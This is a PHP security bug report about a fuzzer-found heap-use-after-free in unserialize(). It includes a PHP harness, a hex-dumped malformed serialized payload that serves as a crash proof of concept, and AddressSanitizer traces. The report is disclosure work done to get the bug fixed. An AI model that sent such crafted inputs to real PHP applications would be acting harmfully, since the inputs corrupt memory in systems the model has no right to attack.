php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #74609 a heap-use-after-free was found at zif_unserialize function
Submitted: 2017-05-18 06:31 UTC Modified: 2017-08-12 13:14 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:0 of 0 (0.0%)
From: varsleak at gmail dot com Assigned:
Status: Duplicate Package: *General Issues
PHP Version: 7.1.6 OS: Ubuntu 1604 & Windows10
Private report: No CVE-ID: None
 [2017-05-18 06:31 UTC] varsleak at gmail dot com
Description:
------------
it was found by afl.



Test script:
---------------
<?php
	if ($argc != 2) {
		print_r("" . $argv[0] . " path/to/data\n");
		return;
	}

	$poc = unserialize(file_get_contents($argv[1]));
?>

data:
4F 3A 38 3A 22 73 74 64 43 6C 61 73 73 22 3A 31
3A 7B 69 3A 30 3B 4F 3A 31 32 3A 22 44 61 74 65
49 6E 74 65 72 76 61 7A 22 3A 33 30 32 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 35 3A 7B 73 3A
31 3A 22 79 22 3B 69 3A 30 30 3B 73 3A 31 3A 22
86 22 3B 69 3A 30 3B 73 3A 31 3A 22 64 22 3B 69
3A 30 30 30 36 30 30 3B 73 3A 31 3A 22 79 22 3B
64 3A 38 36 32 30 31 30 36 30 30 30 30 3B 73 3A
31 3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22
30 30 F2 30 64 61 79 22 3B 64 3A 30 30 30 30 32
30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 32 30 31 30 45
39 38 3B 73 3A 31 3A 22 69 22 3B 52 3A 30 37 3B
73 3A 31 3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37
3A 22 30 30 F2 30 64 61 79 22 3B 64 3A 30 30 30
30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 31 31 45
39 38 3B 73 3A 31 3A 22 7C 22 3B 69 3A 31 30 30
31 36 36 30 34 35 37 30 30 30 30 30 30 3B 73 3A
31 3A 22 73 22 3B 64 3A 38 36 32 30 30 30 30 30
30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 39 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 32 30 31 30 45 39 38 3B 73
3A 31 3A 22 69 22 3B 52 3A 2B 37 3B 73 3A 31 3A
22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22 30 30
F2 30 64 61 79 22 3B 64 3A 31 30 30 30 30 30 32
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 33 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 31 31 45 39 38 3B
73 3A 31 3A 22 69 22 3B 69 3A 31 30 30 30 3B 73
3A 31 3A 22 75 22 3B 69 3A 30 3B 73 3A 31 3A 22
64 22 3B 69 3A 30 30 3B 73 3A 31 3A 22 6D 22 3B
64 3A 38 36 32 30 31 30 45 39 38 3B 73 3A 31 3A
22 69 22 3B 69 3A 31 36 30 30 30 30 3B 73 3A 31
3A 22 73 22 3B 69 3A 2D 36 3B 73 3A 37 3A 22 30
30 F2 30 64 61 79 22 3B 64 3A 30 30 30 30 30 30
32 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30 32 30 31 30 45 39
38 3B 73 3A 31 3A 22 8C 22 3B 52 3A 30 34 3B 69
3A 30 3B 4F 3A 38 3A 22 73 74 64 43 6C 61 73 73
22 3A 33 31 3A 30 73 3A 31 3A 22 30 22 3B 61 3A
30 3A 7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31
3A 22 53 51 4C 69 74 65 33 D3 74 6D 74 22 3A 30
3A 7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A
22 53 51 4C 69 74 65 33 53 74 6D 74 22 3A 30 3A
7B 7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A 22
53 51 4C 69 74 65 33 53 74 6D 74 22 3A 30 3A 7B
7D 73 3A 31 3A 22 62 22 3B 43 3A 31 31 3A 22 53
51 4C 69 74 65 33 53 74 6D 74 22 3A 34 33 31 3A
32 35 01 30 3B 73 3A 31 3A 22 6D 22 3B 54 3A 30
3B 73 3A 31 3A 22 64 22 3B 69 3A 30 30 39 30 36
38 30 36 30 35 3B 73 3A 31 3A 22 68 22 3B 69 3A
00 10 13 13 13 13 13 13 13 13 13 13 13 13 13 13
13 13 13 30 33 C1 33 33 33 33 33 30 44 30 30 30
32 30 30 33 33 33 33 33 33 33 33 33 33 33 38 3B
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 00 02 33 33 33 30 30 33 33 30 33
33 30 30 30 30 30 1D 25 30 30 4C 65 6E 67 74 68
45 78 63 65 70 74 69 6F 65 72 61 74 6F 72 49 74
65 72 61 44 4F 4D 43 6F 6D 6D 65 6E 74 74 6F 72
31 37 3A 22 66 00 72 64 30 79 30 30 30 22 30 30
30 31 30 30 30 3B 73 3A 34 3A 22 30 30 74 30 30
30 22 3B 69 3A 30 30 30 33 33 30 3B 73 3A 31 3A
22 64 22 3B 69 35 1B 30 33 33 30 30 69 30 30 3B
73 30 30 30 30 22 30 30 30 30 5F 30 30 30 63 30
30 30 30 72 30 30 30 30 30 76 30 22 30 30 3A 30
21 7D 30 30 6D 3A 30 3A 30 30 30 30 7D 73 3A 32
3A 22 30 30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72
3A 34 3B 7D 69 3A 30 3B 72 3A 36 3B 80 73 3A 32
3A 22 30 36 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72
3A 36 3B 7D 73 3A 32 3A 22 30 37 22 3B 61 3A 31
3A 7B 69 3A 30 3B 72 3A 36 3B 7D 73 3A 32 3A 22
30 38 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36
3B 7D 73 3A 32 3A 22 30 39 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 30 31 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 31 3B 7D 73 3A 33 3A 22 63 30
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 63 30 33 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 63 30
34 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 63 30 35 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
36 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 31 30 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 30
38 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 30 39 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 30 32
30 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 33 3A 22 30 32 31 22 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 73 3A 33 3A 22 63 32
32 22 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B
7D 73 3A 31 3A 22 64 22 3B 61 3A 31 3A 7B 69 3A
30 3B 72 3A 36 3B 7D 73 3A 31 3A 22 65 22 3B 69
3A 30 3B 73 3A 31 3A 22 66 22 3B 61 3A 32 33 3A
7B 69 3A 30 3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A
36 3B 7D 69 3A 31 3B 61 3A 31 3A 7B 69 3A 30 3B
72 3A 36 3B 7D 69 3A 32 3B 61 3A 31 3A 7B 69 3A
30 3B 72 3A 36 3B 7D 69 3A 33 3B 61 3A 31 3A 7B
69 3A 30 3B 72 3A 36 3B 7D 69 3A 34 3B 61 3A 31
3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69 3A 35 3B 61
3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69 3A 36
3B 61 3A 31 3A 7B 69 3A 30 3B 72 3A 36 3B 7D 69
3A 37 3B 61 3A 31 30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 3A 7B 69 3A 30 3B

use 010editor save this hex data to a file.

Expected result:
----------------
no crash.

Actual result:
--------------
USE_ZEND_ALLOC=1:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING


************************************************************************
USE_ZEND_ALLOC=0:

Warning: Class __PHP_Incomplete_Class has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7

Warning: Class SQLite3Stmt has no unserializer in /home/varsleak/github/php-fuzzer/unserialize_workdir/fuzz_php.php.bak on line 7
ASAN:DEADLYSIGNAL
=================================================================
==27059==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000182452b bp 0x7ffcaab8b4d0 sp 0x7ffcaab8b320 T0)
==27059==The signal is caused by a READ memory access.
==27059==Hint: address points to the zero page.
    #0 0x182452a in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2
    #1 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #2 0x182297c in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:822:7
    #3 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #4 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #5 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #6 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #7 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #8 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #9 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #10 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #11 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #12 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #13 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #14 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #15 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #16 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #17 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #18 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #19 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #20 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #21 0x7fdf86dab82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #22 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:671:2 in php_var_unserialize_internal
==27059==ABORTING
➜  unserialize_workdir USE_ZEND_ALLOC=0 ../afl_php-7.1.3RC1 fuzz_php.php.bak syncdir/fuzzer2/crashes/id:000000,sig:06,src:003387+001233,op:splice,rep:2 
=================================================================
==14446==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019a28 at pc 0x000001826ed1 bp 0x7ffd7b3fac90 sp 0x7ffd7b3fac88
READ of size 1 at 0x612000019a28 thread T0
    #0 0x1826ed0 in zval_get_type /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18
    #1 0x1826ed0 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:637
    #2 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #3 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #4 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #5 0x18298d6 in process_nested_data /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:452:8
    #6 0x182817b in object_common2 /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:556:7
    #7 0x18261a4 in php_var_unserialize_internal /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:989:9
    #8 0x181c0a3 in php_var_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var_unserializer.re:584:11
    #9 0x17c5584 in zif_unserialize /home/varsleak/github/fuzzy/php-src/ext/standard/var.c:1114:7
    #10 0x1f20e1f in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:685:2
    #11 0x1d61b89 in execute_ex /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:432:7
    #12 0x1d6269c in zend_execute /home/varsleak/github/fuzzy/php-src/Zend/zend_vm_execute.h:478:2
    #13 0x1ba9081 in zend_execute_scripts /home/varsleak/github/fuzzy/php-src/Zend/zend.c:1476:4
    #14 0x18e8da6 in php_execute_script /home/varsleak/github/fuzzy/php-src/main/main.c:2537:14
    #15 0x208b394 in do_cli /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:993:5
    #16 0x2086f1d in main /home/varsleak/github/fuzzy/php-src/sapi/cli/php_cli.c:1381:18
    #17 0x7fd2393a582f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c7d8 in _start (/home/varsleak/github/php-fuzzer/afl_php-7.1.3RC1+0x43c7d8)

0x612000019a28 is located 104 bytes inside of 288-byte region [0x6120000199c0,0x612000019ae0)
freed by thread T0 here:
    #0 0x4f7380 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1a6b764 in _efree /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2428:4

previously allocated by thread T0 here:
    #0 0x4f7538 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x1a6c5b8 in __zend_malloc /home/varsleak/github/fuzzy/php-src/Zend/zend_alloc.c:2820:14

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/fuzzy/php-src/Zend/zend_types.h:332:18 in zval_get_type
Shadow bytes around the buggy address:
  0x0c247fffb2f0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb300: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c247fffb310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c247fffb320: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa
  0x0c247fffb330: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=>0x0c247fffb340: fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd
  0x0c247fffb350: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c247fffb360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c247fffb390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==14446==ABORTING


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-05-18 06:35 UTC] varsleak at gmail dot com
-Summary: a heap-buffer-overflow was found at zif_unserialize function +Summary: a heap-use-after-free was found at zif_unserialize function
 [2017-05-18 06:35 UTC] varsleak at gmail dot com
a heap-use-after-free vulnerability.
 [2017-05-18 06:56 UTC] whitehat002 at hotmail dot com
Is this the result of using the fuzz tool?How do you make sure it is a 'use after free' bug?
 [2017-05-18 10:16 UTC] varsleak at gmail dot com
This is the result of recompiled PHP-7.1.5 without modify:

➜  php-orig git:(PHP-7.1.5) ✗ ./configure --disable-shared --enable-static CFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CXXFLAGS="-g -ggdb -fsanitize=address -fsanitize-coverage=trace-cmp,trace-pc-guard,indirect-calls" CC=clang CXX=clang++ LIBS="-lXpm"



➜  php-orig git:(PHP-7.1.5) ✗ USE_ZEND_ALLOC=0 sapi/cli/php ~/github/php-src-vul/heap-use-after-free/fuzzer.php ~/github/php-src-vul/heap-use-after-free/heap-use-after-free.data 
=================================================================
==29990==ERROR: AddressSanitizer: heap-use-after-free on address 0x612000019d28 at pc 0x0000015f54b6 bp 0x7ffcb6c37360 sp 0x7ffcb6c37358
READ of size 1 at 0x612000019d28 thread T0
    #0 0x15f54b5 in zval_get_type /home/varsleak/github/php-orig/Zend/zend_types.h:332:18
    #1 0x15fa035 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:637:6
    #2 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #3 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #4 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #5 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #9 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #10 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #11 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #12 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #13 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #14 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #15 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #16 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #17 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #18 0x43c298 in _start (/home/varsleak/github/php-orig/sapi/cli/php+0x43c298)

0x612000019d28 is located 104 bytes inside of 288-byte region [0x612000019cc0,0x612000019de0)
freed by thread T0 here:
    #0 0x4f6e40 in __interceptor_cfree.localalias.0 /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:55
    #1 0x1864b39 in _efree /home/varsleak/github/php-orig/Zend/zend_alloc.c:2428:4
    #2 0x19df0af in zend_hash_do_resize /home/varsleak/github/php-orig/Zend/zend_hash.c:867:3
    #3 0x19c72c6 in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:590:2
    #4 0x19c7cf0 in _zend_hash_add_new /home/varsleak/github/php-orig/Zend/zend_hash.c:637:9
    #5 0x160320c in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:440:13
    #6 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #7 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #8 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #9 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #10 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #11 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #12 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #13 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #14 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #15 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #16 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #17 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #18 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #19 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #20 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

previously allocated by thread T0 here:
    #0 0x4f6ff8 in __interceptor_malloc /home/varsleak/github/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
    #1 0x186570b in __zend_malloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2820:14
    #2 0x186485e in _emalloc /home/varsleak/github/php-orig/Zend/zend_alloc.c:2413:11
    #3 0x19bcb5e in zend_hash_real_init_ex /home/varsleak/github/php-orig/Zend/zend_hash.c:138:3
    #4 0x19c1227 in zend_hash_check_init /home/varsleak/github/php-orig/Zend/zend_hash.c:161:3
    #5 0x19c6b8b in _zend_hash_add_or_update_i /home/varsleak/github/php-orig/Zend/zend_hash.c:551:3
    #6 0x19c81e7 in _zend_hash_str_update /home/varsleak/github/php-orig/Zend/zend_hash.c:651:14
    #7 0x15c567e in php_store_class_name /home/varsleak/github/php-orig/ext/standard/incomplete_class.c:159:2
    #8 0x15fd62f in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:985:3
    #9 0x160332a in process_nested_data /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:452:8
    #10 0x16011d6 in object_common2 /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:556:7
    #11 0x15fd663 in php_var_unserialize_internal /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:989:9
    #12 0x15f56d0 in php_var_unserialize /home/varsleak/github/php-orig/ext/standard/var_unserializer.re:584:11
    #13 0x15b2944 in zif_unserialize /home/varsleak/github/php-orig/ext/standard/var.c:1114:7
    #14 0x1cafc1c in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:675:2
    #15 0x1b04811 in execute_ex /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:432:7
    #16 0x1b04f50 in zend_execute /home/varsleak/github/php-orig/Zend/zend_vm_execute.h:474:2
    #17 0x196bb51 in zend_execute_scripts /home/varsleak/github/php-orig/Zend/zend.c:1476:4
    #18 0x16d1f22 in php_execute_script /home/varsleak/github/php-orig/main/main.c:2537:14
    #19 0x1e2ec61 in do_cli /home/varsleak/github/php-orig/sapi/cli/php_cli.c:993:5
    #20 0x1e2b6dc in main /home/varsleak/github/php-orig/sapi/cli/php_cli.c:1381:18
    #21 0x7f9c5985b82f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-use-after-free /home/varsleak/github/php-orig/Zend/zend_types.h:332:18 in zval_get_type
